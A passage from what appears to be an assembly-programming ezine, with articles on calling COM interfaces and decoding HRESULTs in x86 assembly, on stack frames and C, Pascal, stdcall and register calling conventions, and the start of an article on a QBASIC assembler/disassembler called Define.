Here is an example of a C++ interface, and how its methods are called:
interface IInterface
{
HRESULT QueryInterface( REFIID iid, void ** ppvObject );
ULONG AddRef();
ULONG Release();
HRESULT Function1( INT param1, INT param2 );
HRESULT Function2( INT param1 );
};
// calling the Function1 method
pObject->Function1( 0, 0);
Now here is how the same functionality can be implemented using assembly
language:
; defining the interface
; each of these values are offsets in the vtable
QueryInterface equ 0h
AddRef equ 4h
Release equ 8h
Function1 equ 0Ch
Function2 equ 10h
; calling the Function1 method in asm
; the method is called by obtaining the address of the object's
; vtable and then calling the function addressed by the proper
; offset in the table
push param2
push param1
mov eax, pObject
push eax
mov eax, [eax]
call [eax + Function1]
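You can see this is somewhat different from calling a function normally.
Here, pObject points to the object, whose first dword holds the address of
the interface's vtable. At the Function1 (0Ch) offset in this table is a
pointer to the actual function we wish to call. Note that pObject itself is
pushed last, as the hidden "this" parameter of the method.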
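The same double indirection can be written out in plain C, which is roughly what a C compiler sees when COM headers are used without C++. The sketch below is self-contained and does not use any Windows header: the struct layout, the demo_ functions and the last_value field are all invented for illustration, with simplified parameter types.

```c
typedef struct IInterface IInterface;

/* The vtable: one function pointer per method, in declaration order.
   With 4-byte pointers these sit at offsets 0h, 4h, 8h, 0Ch and 10h. */
typedef struct IInterfaceVtbl {
    long          (*QueryInterface)(IInterface *self, const void *iid, void **out);
    unsigned long (*AddRef)(IInterface *self);
    unsigned long (*Release)(IInterface *self);
    long          (*Function1)(IInterface *self, int param1, int param2);
    long          (*Function2)(IInterface *self, int param1);
} IInterfaceVtbl;

/* The object: its first member is the pointer to the vtable. */
struct IInterface {
    const IInterfaceVtbl *vtbl;
    unsigned long         refs;        /* hypothetical reference count */
    int                   last_value;  /* hypothetical state, set by the methods */
};

static long demo_query(IInterface *self, const void *iid, void **out)
{
    (void)iid;
    *out = self;
    self->refs++;
    return 0;
}
static unsigned long demo_addref(IInterface *self)  { return ++self->refs; }
static unsigned long demo_release(IInterface *self) { return --self->refs; }
static long demo_function1(IInterface *self, int param1, int param2)
{
    self->last_value = param1 + param2;
    return 0;
}
static long demo_function2(IInterface *self, int param1)
{
    self->last_value = param1;
    return 0;
}

static const IInterfaceVtbl demo_vtbl = {
    demo_query, demo_addref, demo_release, demo_function1, demo_function2
};

IInterface demo_object = { &demo_vtbl, 1, 0 };

/* Equivalent of: push param2 / push param1 / push pObject /
   mov eax,[pObject] / call [eax + Function1] */
long call_function1(IInterface *obj, int param1, int param2)
{
    const IInterfaceVtbl *vt = obj->vtbl;   /* fetch the vtable address */
    return vt->Function1(obj, param1, param2);
}
```

Here call_function1(&demo_object, 2, 3) reaches demo_function1 through the table and leaves 5 in demo_object.last_value. The object pointer is passed explicitly as the first argument, which corresponds to the final push in the assembly version.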
Using HRESULTs
-------------------------------------------------------------------------------
The return value of OLE APIs and methods is an HRESULT. This is not a handle
to anything, but is merely a 32-bit value with several fields encoded in the
value. The parts of an HRESULT are shown below.
HRESULTs are 32 bit values laid out as follows:
 3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1
 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
+-+-+-+-+-+---------------------+-------------------------------+
|S|R|C|N|r|      Facility       |             Code              |
+-+-+-+-+-+---------------------+-------------------------------+
S - Severity Bit
Used to indicate success or failure
0 - Success
1 - Fail
By noting that this bit is actually the sign bit of the 32-bit value,
checking success/failure is simply performed by checking its sign:
call ComFunction ; call the function
test eax,eax ; now check its return value
js error ; jump if signed (meaning error returned)
; success, so continue
R - reserved portion of the facility code, corresponds to NT's
second severity bit.
C - reserved portion of the facility code, corresponds to NT's
C field.
N - reserved portion of the facility code. Used to indicate a
mapped NT status value.
r - reserved portion of the facility code. Reserved for internal
use. Used to indicate HRESULT values that are not status
values, but are instead message ids for display strings.
Facility - is the facility code
FACILITY_WINDOWS = 8
FACILITY_STORAGE = 3
FACILITY_RPC = 1
FACILITY_WIN32 = 7
FACILITY_CONTROL = 10
FACILITY_NULL = 0
FACILITY_ITF = 4
FACILITY_DISPATCH = 2
To retrieve the Facility,
call ComFunction ; call the function
shr eax, 16 ; shift the HRESULT to the right by 16 bits
and eax, 1FFFh ; mask the bits, so only the facility remains
; eax now contains the HRESULT's Facility code
Code - is the facility's status code
To get the Facility's status code,
call ComFunction ; call the function
and eax, 0000FFFFh ; mask out the upper 16 bits
; eax now contains the HRESULT's Facility's status code
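The three extractions above can be tried out on a known value with a few lines of C. The helper names below are made up for this sketch; the masks and shifts are the ones used in the assembly fragments. The sample value 80070005h is the familiar "access denied" HRESULT, which has the severity bit set, facility 7 (FACILITY_WIN32) and code 5.

```c
#include <stdint.h>

/* Nonzero when the severity (sign) bit is set, i.e. the call failed. */
int hresult_failed(uint32_t hr)
{
    return (int)((hr >> 31) & 1u);
}

/* Facility field: shift right by 16, then mask with 1FFFh. */
uint32_t hresult_facility(uint32_t hr)
{
    return (hr >> 16) & 0x1FFFu;
}

/* Status code: the low 16 bits. */
uint32_t hresult_code(uint32_t hr)
{
    return hr & 0xFFFFu;
}
```

For 80070005h these return 1, 7 and 5 respectively; for a success value of 0 all three return 0.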
Using COM with MASM
------------------------------------------------------------------------------
If you use MASM to assemble your programs, you can use some of its
capabilities to make calling COM functions very easy. Using invoke, you can
make COM calls look almost as clean as regular calls, plus you can add type
checking to each function.
Defining the interface:
; every COM method receives the interface pointer ("this") as its first
; parameter, so each prototype starts with an extra DWORD
; (the IUnknown_* pointer types are assumed to be defined in the same way)
IInterface_Function1Proto typedef proto :DWORD, :DWORD, :DWORD
IInterface_Function2Proto typedef proto :DWORD, :DWORD
IInterface_Function1 typedef ptr IInterface_Function1Proto
IInterface_Function2 typedef ptr IInterface_Function2Proto
IInterface struct DWORD
QueryInterface IUnknown_QueryInterface ?
AddRef IUnknown_AddRef ?
Release IUnknown_Release ?
Function1 IInterface_Function1 ?
Function2 IInterface_Function2 ?
IInterface ends
Using the interface to call COM functions:
mov eax, pObject
mov eax, [eax]
invoke (IInterface PTR [eax]).Function1, pObject, 0, 0
As you can see, the syntax may seem a bit strange, but it allows for a simple
method using the function name itself instead of offsets, as well as type
checking.
A Sample program written using COM
------------------------------------------------------------------------------
Here is some sample source code which uses COM written in straight assembly
language, so it should be compatible with any assembler you prefer with only
minor changes necessary.
This program uses the Windows Shell Interfaces to show the contents of the
Desktop folder in a window. The program is not complete, but shows how the
COM library is initialized, de-initialized, and used. It also shows how the
shell library is used to get folders and objects, and how to perform
actions on them.
.386
.model flat, stdcall
include windows.inc ; include the standard windows header
include shlobj.inc ; this include file contains the shell namespace
; definitions and constants
;----------------------------------------------------------
.data
wMsg MSG <?>
g_hInstance dd ?
g_pShellMalloc dd ?
pshf dd ? ; shell folder object
peidl dd ? ; enum id list object
lvi LV_ITEM <?>
iCount dd ?
strret STRRET <?>
shfi SHFILEINFO <?>
...
;----------------------------------------------------------
.code
; Entry Point
start:
push 0h
call GetModuleHandle
mov g_hInstance,eax
call InitCommonControls
; initialize the Component Object Model(COM) library
; this function must be called before any COM functions are called
push 0
call CoInitialize
test eax,eax ; error when the MSB = 1
; (MSB = the sign bit)
js exit ; js = jump if signed
; Get the Shells IMalloc object pointer, and save it to a global variable
push offset g_pShellMalloc
call SHGetMalloc
cmp eax, E_FAIL
jz shutdown
; here we would set up the windows, list view, message loop, and so on....
; we would also call the FillListView procedure...
; ....
; Cleanup
; Release IMalloc Object pointer
mov eax, g_pShellMalloc
push eax
mov eax, [eax]
call [eax + Release] ; g_pShellMalloc->Release();
shutdown:
; close the COM library
call CoUninitialize
exit:
push wMsg.wParam
call ExitProcess
; Program Terminates Here
;----------------------------------------------------------
FillListView proc
; get the desktop shell folder, saved to pshf
push offset pshf
call SHGetDesktopFolder
; get the objects of the desktop folder using the EnumObjects method of
; the desktop's shell folder object
push offset peidl
push SHCONTF_NONFOLDERS
push 0
mov eax, pshf
push eax
mov eax, [eax]
call [eax + EnumObjects]
; now loop through the enum id list
idlist_loop:
; Get next id list item
push 0
push offset pidl
push 1
mov eax, peidl
push eax
mov eax, [eax]
call [eax + Next]
test eax,eax
jnz idlist_endloop
mov lvi.imask, LVIF_TEXT or LVIF_IMAGE
mov lvi.iItem,
; Get the item's name by using the GetDisplayNameOf method
push offset strret
push SHGDN_NORMAL
push pidl ; the item id list itself, not the address of the variable
mov eax, pshf
push eax
mov eax, [eax]
call [eax + GetDisplayNameOf]
; GetDisplayNameOf returns the name in 1 of 3 forms, so get the correct
; form and act accordingly
cmp strret.uType, STRRET_CSTR
je strret_cstr
cmp strret.uType, STRRET_OFFSET
je strret_offset
strret_olestr:
; here you could use WideCharToMultiByte to get the string,
; I have left it out because I am lazy
jmp strret_end
strret_cstr:
lea eax, strret.cStr
jmp strret_end
strret_offset:
mov eax, pidl
add eax, strret.uOffset
strret_end:
mov lvi.pszText, eax
; Get the items icon
push SHGFI_PIDL or SHGFI_SYSICONINDEX or SHGFI_SMALLICON or SHGFI_ICON
push sizeof SHFILEINFO
push offset shfi
push 0
push pidl
call SHGetFileInfo
mov eax, shfi.iIcon
mov lvi.iImage, eax
; now add item to the list
push offset lvi
push 0
push LVM_INSERTITEM
push hWndListView
call SendMessage
; repeat the loop
jmp idlist_loop
idlist_endloop:
; now free the enum id list
; Remember all allocated objects must be released...
mov eax, peidl
push eax
mov eax,[eax]
call [eax + Release]
; free the desktop shell folder object
mov eax, pshf
push eax
mov eax,[eax]
call [eax + Release]
ret
FillListView endp
END start
Conclusion
-------------------------------------------------------------------------------
Well, that is about it for using COM with assembly language. Hopefully, my
next article will go into how to define your own interfaces. As you can
see, using COM is not difficult at all, and with it you can add a very
powerful capability to your assembly language programs.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Stack Frames and High-Level Calls
by mammon_
Last month I covered how to implement high-level calls in Nasm. Since then it
has come to my attention that many beginning programmers are unfamiliar with
calling conventions and the stack frame; to remedy this I have prepared a brief
discussion of these topics.
The CALL Instruction
--------------------
At its most basic, an assembly language call takes this form:
push [parameters]
call [address]
Some assemblers will require that the CALL statement take as an argument only
addresses leading to external functions or addresses created with a macro or
directive such as PROC. However, as a quick glance through a debugger or a
passing familiarity with Nasm will demonstrate, the CALL instruction simply
jumps to an address [often a label in the source code] while pushing the
contents of EIP [containing the address of the instruction following the call]
onto the stack. The CALL instruction is therefore equivalent to the following
code:
push EIP
jmp [address]
The address that has been called will therefore have the stack set up as follows:
[Last Parameter Pushed]: DWORD
[Address of Caller] : DWORD
--- "Top" of Stack [esp] ---
At this point, anything pushed onto the stack will be on top of [that is, with a
lower memory address, since the stack "grows" downwards] the return address.
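The equivalence between CALL and a PUSH followed by a JMP can be sketched
outside of assembly. The Python model below is only an illustration: the
Machine class, its dictionary-based memory and the addresses used are all
assumptions made for the example, not part of any real tool.

```python
# Toy model of a 32-bit stack: memory is a dict of address -> DWORD.
# Machine, push and call are hypothetical names used only for this sketch.
class Machine:
    def __init__(self, esp=0x1000, eip=0):
        self.mem = {}
        self.esp = esp
        self.eip = eip

    def push(self, value):
        self.esp -= 4                  # the stack "grows" downwards
        self.mem[self.esp] = value

    def call(self, target, return_address):
        self.push(return_address)      # "push EIP" [address after the CALL]
        self.eip = target              # "jmp [address]"


m = Machine()
m.push(0xAAAA)                         # last parameter pushed
m.call(target=0x4000, return_address=0x2005)
print(hex(m.mem[m.esp]))               # what the callee finds at [esp]
print(hex(m.mem[m.esp + 4]))           # what the callee finds at [esp+4]
```

On entry to the called routine the return address sits at [esp] and the last
parameter pushed sits just above it at [esp+4].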
The Stack Frame
---------------
Note that the parameters to the call therefore cannot be POPed from the stack,
as this will destroy the saved return address and thus cause the application to
crash upon returning from the call [unless, of course, a chosen return address
is PUSHed onto the stack before returning from the call]. The logical way to
reference these parameters, then, would be as offsets from the stack pointer:
[parameter 2] : DWORD esp + 8
[parameter 1] : DWORD esp + 4
[Address of Caller]: DWORD esp
----- "Top" of Stack [esp] -----
In this example, "parameter 1" is the parameter pushed onto the stack last, and
"parameter 2" is the parameter pushed onto the stack before parameter 1, as
follows:
push [parameter 2]
push [parameter 1]
call [procedure]
The problem with referring to parameters as offsets from esp is that esp will
change whenever a value is PUSHed onto the stack during the routine. For this
reason, it is standard for routines which take parameters to set up a "stack
frame".
In a stack frame, the base pointer [ebp] is set equal to the stack pointer [esp]
at the start of the call; this provides a "base" address from which parameters
can be addressed as offsets. It is assumed that the caller had a stack frame
also; thus the value of ebp must be preserved in order to prevent causing damage
to the caller. The stack frame usually takes the following form:
push ebp
mov ebp, esp
... [actual code for the routine] ...
mov esp, ebp
pop ebp
This means that once the stack frame has been entered, the stack has the
following structure:
[parameter 2] : DWORD ebp + 12
[parameter 1] : DWORD ebp + 8
[Address of Caller]: DWORD ebp + 4
[Old Base Pointer] : DWORD ebp
----- Base Pointer [ebp] -----
----- "Top" of Stack [esp] -----
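The offsets in this layout can be checked with a small simulation. This is a
sketch under stated assumptions: frame_after_prologue is a hypothetical helper,
the stack is modelled as a Python dict, and string labels stand in for the
real DWORD values.

```python
def frame_after_prologue(params, return_address, old_ebp, esp=0x1000):
    """Model pushing the parameters, the CALL, and 'push ebp / mov ebp, esp'.

    params is given with parameter 1 first; parameter 1 is pushed last,
    as in the article. Returns (memory, ebp).
    """
    mem = {}

    def push(value):
        nonlocal esp
        esp -= 4
        mem[esp] = value

    for p in reversed(params):     # push [parameter 2], then [parameter 1]
        push(p)
    push(return_address)           # call [procedure]
    push(old_ebp)                  # push ebp
    ebp = esp                      # mov ebp, esp
    return mem, ebp


mem, ebp = frame_after_prologue(["param1", "param2"], "ret_addr", "old_ebp")
for offset in (12, 8, 4, 0):
    print(f"ebp + {offset:2}: {mem[ebp + offset]}")
```

Because ebp is fixed for the lifetime of the frame, these offsets stay valid
no matter how many further values the routine pushes.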
The use of the base pointer also allows space to be allocated on the stack for
local variables. This is done by simply subtracting bytes from esp; since esp is
restored when the stack frame is exited, this space will automatically be
deallocated. The local variables are then referred to as *negative* offsets from
ebp; these may be EQUed to meaningful symbol names in the source code. A routine
that has 3 local DWORD variables would take the following form:
Var1 EQU [ebp-4]
Var2 EQU [ebp-8]
Var3 EQU [ebp-12] ;provide meaningful names for the variables
push ebp
mov ebp, esp
sub esp, 3*4 ;3 DWORDs at 4 BYTEs apiece
... [actual code for the routine] ...
mov esp, ebp
pop ebp
This routine would then have the following stack structure after the allocation
of the local variables:
[parameter 2] : DWORD ebp + 12
[parameter 1] : DWORD ebp + 8
[Address of Caller]: DWORD ebp + 4
[Old Base Pointer] : DWORD ebp
----- Base Pointer [ebp] -----
[Var1] : DWORD ebp - 4
[Var2] : DWORD ebp - 8
[Var3] : DWORD ebp - 12
----- "Top" of Stack [esp] -----
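To see why the local variables are deallocated automatically, the prologue and
epilogue can be traced step by step. The function below is a hypothetical
model written for this illustration; the starting values of esp and ebp are
arbitrary.

```python
def routine_with_locals(esp, ebp, local_count):
    """Trace push ebp / mov ebp,esp / sub esp,N*4 / mov esp,ebp / pop ebp."""
    mem = {}
    esp -= 4
    mem[esp] = ebp                     # push ebp
    ebp = esp                          # mov ebp, esp
    esp -= 4 * local_count             # sub esp, local_count*4
    var_addresses = [ebp - 4 * (i + 1) for i in range(local_count)]
    lowest_esp = esp                   # esp while the routine body runs
    esp = ebp                          # mov esp, ebp [frees the locals]
    ebp = mem[esp]                     # pop ebp
    esp += 4
    return var_addresses, lowest_esp, esp, ebp


variables, lowest_esp, esp_out, ebp_out = routine_with_locals(0x1000, 0x2000, 3)
print([hex(a) for a in variables])     # addresses of Var1, Var2, Var3
print(hex(esp_out), hex(ebp_out))      # both registers are back where they began
```

Var3, the last local, lives at the address esp points to during the routine
body, and both esp and ebp return to their entry values afterwards.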
The stack frame can also be used to provide a call trace, as it stores the
base pointer of [and thus a pointer to the caller of] the caller. Assume that a
program has the following flow of execution:
proc_1: push dword call1_p2
push dword call1_p1
call proc_2
________proc_2: push call2_p1
call proc_3
________________proc_3: push call3_p1
call proc_4
Upon creation of the stack frame in proc_4, the stack has the following
structure:
[call1_p2] : DWORD ebp + 36
[call1_p1] : DWORD ebp + 32
[Return Addr of Call1] : DWORD ebp + 28
[Old Base Pointer] : DWORD ebp + 24
---- Base Pointer of Call 1 ----
[call2_p1] : DWORD ebp + 20
[Return Addr of Call2] : DWORD ebp + 16
[Base Pointer of Call1]: DWORD ebp + 12
---- Base Pointer of Call 2 ----
[call3_p1] : DWORD ebp + 8
[Return Addr of Call3] : DWORD ebp + 4
[Base Pointer of Call2]: DWORD ebp
----- Base Pointer [ebp] -----
----- "Top" of Stack [esp] -----
As you can see, for each previous call the return address is [ebp+4], where ebp
is the address of the saved base pointer for the call previous to that one.
Thus, one could traverse the history of stack frames as follows:
mov eax, ebp ; eax = address of previous ebp
mov ecx, 10 ; trace the last 10 calls
loop_start:
mov ebx, [eax+4] ; ebx = return address for call
call print_stack_trace
mov eax, [eax] ; step back one stack frame
loop loop_start
This is exceptionally useful for exception handling; the handling function will
be able to print out a stack history to aid debugging. This principle can also
be applied in conjunction with debugging code [for example, the Win32 debug API]
to create a utility which will trace the calls [in reality, the stack frames of
the calls] made by a target. Essentially, this would boil down to the following
logic:
1) Breakpoint on changes to EBP
2) On Break, get return address [ebp+4]
3) Get instruction prior to return address
4) Print or log the instruction
Note that this can be enhanced to resolve symbol names in the logged CALL
instruction, such that local or API address labels [e.g. GetWindowTextA] can be
logged rather than just the address itself.
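The frame-walking idea can be tried against the proc_1 to proc_4 layout shown
earlier. This is a minimal sketch: walk_frames is a hypothetical helper, the
addresses are made up, and it assumes the outermost saved base pointer is 0 so
that the walk knows where to stop [the fixed count of 10 in the assembly loop
has no such check].

```python
def walk_frames(mem, ebp, max_frames=10):
    """Follow the chain of saved base pointers; return addresses, newest first."""
    trace = []
    while ebp in mem and len(trace) < max_frames:
        trace.append(mem[ebp + 4])     # return address for this frame
        ebp = mem[ebp]                 # step back one stack frame
    return trace


RET1, RET2, RET3 = 0x401010, 0x402020, 0x403030   # made-up return addresses
EBP4 = 0x0F00                                     # proc_4's base pointer
stack = {
    EBP4 + 0:  EBP4 + 12,   # [Base Pointer of Call2]
    EBP4 + 4:  RET3,        # [Return Addr of Call3]
    EBP4 + 8:  "call3_p1",
    EBP4 + 12: EBP4 + 24,   # [Base Pointer of Call1]
    EBP4 + 16: RET2,        # [Return Addr of Call2]
    EBP4 + 20: "call2_p1",
    EBP4 + 24: 0,           # [Old Base Pointer], assumed 0 = end of chain
    EBP4 + 28: RET1,        # [Return Addr of Call1]
}
trace = walk_frames(stack, EBP4)
print([hex(addr) for addr in trace])
```

A real tracer would also have to verify that each saved base pointer actually
points into the stack before dereferencing it.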
The ENTER Instruction
---------------------
The ENTER instruction is used to create a stack frame with a single instruction;
it is equivalent to the code
push ebp
mov ebp, esp
The ENTER instruction takes a first parameter that specifies the number of bytes
to reserve for local variables [the equivalent of following the two
instructions above with "sub esp, n"]; a second parameter gives the nesting
level [0-31] of the current stack frame in the overall program structure. The
nesting level is often used by high-level languages to save call trace
information for error handlers, as it specifies the number of additional
[previous] stack frame pointers to save on the stack.
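The effect of both ENTER parameters can be modelled in a few lines. The sketch
below follows the operation as documented in the Intel instruction reference
for a 32-bit stack; the enter function, the regs dictionary and the starting
register values are assumptions made for this illustration.

```python
def enter(mem, regs, size, level=0):
    """Model of 'ENTER size, level' on a 32-bit stack [illustrative only]."""
    def push(value):
        regs["esp"] -= 4
        mem[regs["esp"]] = value

    level %= 32                        # the nesting level is taken modulo 32
    push(regs["ebp"])                  # push ebp
    frame_temp = regs["esp"]
    if level > 0:
        for _ in range(1, level):      # copy level-1 earlier frame pointers
            regs["ebp"] -= 4
            push(mem[regs["ebp"]])
        push(frame_temp)               # then the new frame pointer itself
    regs["ebp"] = frame_temp           # mov ebp, esp
    regs["esp"] -= size                # reserve space for local variables


mem0, regs0 = {}, {"esp": 0x1000, "ebp": 0x2000}
enter(mem0, regs0, 12)                 # ENTER 12, 0
mem1, regs1 = {}, {"esp": 0x1000, "ebp": 0x2000}
enter(mem1, regs1, 8, level=1)         # ENTER 8, 1
print(regs0, regs1)
```

With a nesting level of 0 the instruction reduces to the familiar
push ebp / mov ebp, esp / sub esp, n sequence.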
The RET Instruction
-------------------
Any routine which is accessed by a CALL instruction must be terminated with a
return [RET] instruction. As one can see from the operation of the CALL
instruction, if you were to attempt to circumvent the RET instruction by JMPing
to the return address, the stack would still be corrupted. The RET statement is
roughly equivalent to the following code:
pop EIP
Note that the RET must take place after exiting the stack frame in order to
avoid corruption of the stack.
The LEAVE Instruction
---------------------
The LEAVE instruction is used to exit a stack frame created with the ENTER
instruction; it is equivalent to the code
mov esp, ebp
pop ebp
The LEAVE instruction takes no parameters and still requires a RET statement to
follow it.
High-level Language Calling Conventions
---------------------------------------
At this point one may wonder what has happened to the parameters pushed onto the
stack prior to the call. Are they still on the stack after the RET, or have they
been cleared? Since the parameters cannot be POPed from the stack while within
the call, they still are on the stack at the RET instruction.
At this point the programmer has two options. They can have the caller clean up
the stack by adding the number of bytes pushed to esp immediately after the
call:
push dword param2
push dword param1
call procedure
add esp, 2 * 4 ;2 DWORDs at 4 BYTEs apiece
Or they can clear the stack by passing to the RET instruction the number of
bytes that need to be cleared:
push dword param2
push dword param1
call procedure
...
procedure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret 8 ;2 DWORDs at 4 BYTEs apiece
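The difference between the two options comes down to where esp ends up
immediately after the RET. The following sketch tracks only the stack pointer;
esp_after_ret is a hypothetical helper and the starting value is arbitrary.

```python
def esp_after_ret(param_count, ret_imm, esp=0x1000):
    """Return esp just after the routine's RET [or RET n] has executed."""
    esp -= 4 * param_count     # caller pushes the parameters
    esp -= 4                   # call: pushes the return address
    esp -= 4                   # push ebp
    esp += 4                   # pop ebp [after mov esp, ebp]
    esp += 4 + ret_imm         # ret pops the return address, plus n bytes
    return esp


plain_ret = esp_after_ret(2, 0)    # caller still owes "add esp, 8"
ret_eight = esp_after_ret(2, 8)    # callee cleaned up with "ret 8"
print(hex(plain_ret), hex(ret_eight))
```

With a plain RET the two parameters are still on the stack, so the caller has
to add 8 to esp; with RET 8 the stack is already balanced.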
Which method is chosen is left up to the programmer; however, when writing a
library or API, one must make clear who is responsible for cleaning up the
stack. In addition, when interfacing with high-level languages, one also has to
make clear which order the parameters are to be pushed in. For this reason there
are calling conventions for the high-level languages.
The C calling convention is used to interface with the C and C++ programming
languages; it is used in the standard C library and in Unix APIs. It pushes the
parameters from right to left, and does not clean up the stack upon return from
the call. A call to a C-style routine would look as follows:
;corresponds to the C code
;procedure(param1, param2)
push dword param2
push dword param1
call procedure
add esp, 8
A C-style routine would have the following structure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret
The Pascal calling convention is used to interface with the Pascal, BASIC, and
Fortran programming languages; it is used in the Win16 API. It pushes the
parameters from left to right, and cleans up the stack upon return from the
call; as such it is the opposite of the C convention. A call to a Pascal
routine would look as follows:
;corresponds to the C code
;procedure(param1, param2)
push dword param1
push dword param2
call procedure
A Pascal-style routine would have the following structure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret 8 ;clear the 2 dword parameters
The Stdcall ["standard call" or __stdcall] calling convention is a combination
of the C and Pascal conventions; it is used in the Win32 API. It pushes the
parameters from right to left, and cleans the stack upon return from the call. A
call to a Stdcall routine would look as follows:
;corresponds to the C code
;procedure(param1, param2)
push dword param2
push dword param1
call procedure
A Stdcall-style routine would have the following structure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret 8
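The three stack-based conventions differ in only two properties, which makes
them easy to tabulate. The sketch below generates the caller's instruction
sequence for each one; the CONVENTIONS table and call_sequence function are
names invented for this illustration.

```python
# Two properties per convention: push order, and who removes the parameters.
CONVENTIONS = {
    "c":       {"right_to_left": True,  "callee_cleans": False},
    "pascal":  {"right_to_left": False, "callee_cleans": True},
    "stdcall": {"right_to_left": True,  "callee_cleans": True},
}


def call_sequence(convention, name, params):
    """Return the caller-side instructions for name(params...)."""
    rules = CONVENTIONS[convention]
    order = list(reversed(params)) if rules["right_to_left"] else list(params)
    lines = [f"push dword {p}" for p in order]
    lines.append(f"call {name}")
    if not rules["callee_cleans"] and params:
        lines.append(f"add esp, {4 * len(params)}")   # caller cleans up
    return lines


for convention in CONVENTIONS:
    print(convention, call_sequence(convention, "procedure", ["param1", "param2"]))
```

The callee side mirrors the last column: a routine that cleans up its own
parameters ends in "ret n", the others in a plain "ret".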
There is also a Register calling convention [also called "fastcall"] which uses
registers rather than the stack to pass parameters. Which registers are used
depends on the compiler [Microsoft's __fastcall, for example, uses ECX and
EDX]; in the variant shown here the first parameter is passed in EAX, the
second in EDX, and the third in EBX, and subsequent parameters are passed via
the stack. A call to a Register routine would look as follows:
;corresponds to the C code
;procedure(param1, param2, param3)
mov eax, param1
mov edx, param2
mov ebx, param3
call procedure
Note that there is no defined standard method of clearing the stack for the
Register convention; however most implementations clear the stack in the Pascal
style.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Define Your Memory
by Alan Baylis
[I am going to preface this article with a brief note, since it is not
covering assembly language per se, but rather a utility that will be of use
to asm coders. The author sums it up well in his original email to me:
"Define is a new type of assembler/disassembler that does not use source
code. The program reads the byte values in memory and checks a library to
find a definition that describes the byte values it reads. The library can
be added to and is used as a permanent macro list to write instructions,
functions, etc to memory. Most assemblers also use standard 3 character
mnemonics to describe the instruction set, however, with Define you can
rename the instructions and your own macros to anything and up to 250
characters."
Sounds pretty promising.
_m ]
For the x86 series of processors I have been working on a new type of assembler
and have written a program called Define. The program could be called a sketch
of what a future version might be like. It is fully workable but suffers from a
few limitations. The first is that it is written in QBASIC, which may be a blow
to devoted machine coders. The second is that it can only comfortably use about
three hundred definitions (definitions are like a library of machine code
macros; I'll discuss them more fully later). A third limitation, though not to
its functionality, is that the program doesn't have a quick mouse- and
menu-driven interface, but I'm working on it.
I liked the idea of macros and saw the necessity of using them so that I and
others don't have to "reinvent the wheel", as it has been put, but I wanted a
way to see the machine code instructions and the byte values that make up the
macro. This can't be done through source code, as the finished code is
generated at the discretion of the compiler's authors and requires a debugger
to verify its content.
To make what was originally intended to be a debugger that works without source
code, I decided to write a program that could read memory and interpret the
byte values it finds into their mnemonic equivalents or better (much like a
debugger), so that while reading memory, if the program found the byte value
205 followed by the value 5 it would display "INT 5". To do this I needed what
I termed a 'definition', which includes the byte values that make up an
instruction or small macro together with a description or name for the
function they perform.
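The lookup described here can be pictured as a table of byte sequences and
names. The following is a minimal sketch and not Define's actual code (which is
written in QBASIC): the DEFINITIONS table, the describe function and the
"DB n" fallback for unknown bytes are all assumptions made for illustration.

```python
# Each definition pairs the byte values of an instruction with a name.
DEFINITIONS = [
    ((205, 5), "INT 5"),
    ((144,), "NOP"),
]


def describe(memory, pos):
    """Return (name, length) for the definition matching memory at pos."""
    for pattern, name in DEFINITIONS:
        if tuple(memory[pos:pos + len(pattern)]) == pattern:
            return name, len(pattern)
    return f"DB {memory[pos]}", 1      # no definition: show the raw byte


memory = bytes([205, 5, 144, 7])
pos = 0
while pos < len(memory):
    name, length = describe(memory, pos)
    print(pos, name)
    pos += length
```

Since a definition stores the byte values themselves, the same table can be
read in the other direction to write those bytes into memory.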
Unlike what I had done with a previous assembler, I decided to put the
definitions in a separate file rather than include them as data within the main
program; this allows definitions to be added or removed later. I then quickly
realised that since these definitions contain the byte values of an
instruction, they could also be used to write the bytes into memory. I added
functions to save and load programs as well as functions to manipulate the
definition file, and the program was underway.
I found while writing the definitions for the instruction set that it would be
good (and necessary) if the program could read an instruction even if one of
the bytes is unknown or variable. I decided to call these bytes undefined
bytes, so that if the program found the number 205 it would display something
like "Interrupt call" regardless of what number followed.
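An undefined byte behaves like a wildcard in the byte pattern. The sketch
below is one possible way to model that, not Define's own implementation: the
UNDEFINED marker, the matches and describe functions, and the rule that more
specific definitions are listed first are all assumptions.

```python
UNDEFINED = None    # marks a byte position that may hold any value

# More specific definitions come first so that they win over wildcards.
DEFINITIONS = [
    ((205, 5), "INT 5"),
    ((205, UNDEFINED), "Interrupt call"),
]


def matches(pattern, memory, pos):
    """True if every defined byte of pattern equals the byte in memory."""
    chunk = memory[pos:pos + len(pattern)]
    if len(chunk) < len(pattern):
        return False                   # ran off the end of memory
    return all(p is UNDEFINED or p == b for p, b in zip(pattern, chunk))


def describe(memory, pos):
    for pattern, name in DEFINITIONS:
        if matches(pattern, memory, pos):
            return name
    return None


print(describe(bytes([205, 5]), 0))
print(describe(bytes([205, 0x21]), 0))
```

The byte 205 followed by 5 still gets its exact name, while 205 followed by
anything else falls through to the general "Interrupt call" definition.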
While reading memory I also wanted a way to exclude data areas from being
interpreted as definitions, so I added a new definition type called addresses,
which contain the addresses of the first and last bytes of a data area and a
name to describe it. If these are turned on in the program then they are used
instead of the normal definitions when reading that part of memory.
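An address definition amounts to a named, inclusive range that takes priority
over byte matching. A small sketch of that check, with a made-up range and
hypothetical names (ADDRESS_DEFS, data_area_at), might look like this:

```python
# (first byte, last byte, name); the range and name are invented examples.
ADDRESS_DEFS = [
    (0x0103, 0x010F, "Message text"),
]


def data_area_at(address, enabled=True):
    """Return the name of the data area containing address, or None."""
    if not enabled:                    # address definitions switched off
        return None
    for first, last, name in ADDRESS_DEFS:
        if first <= address <= last:
            return name
    return None


for address in (0x0100, 0x0103, 0x010F, 0x0110):
    print(hex(address), data_area_at(address))
```

A reader loop would call this first and only fall back to the normal
definitions when it returns None.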
To then take Define closer to being an assembler rather than a debugger I also
included labels, which name memory addresses and the destinations of jump and
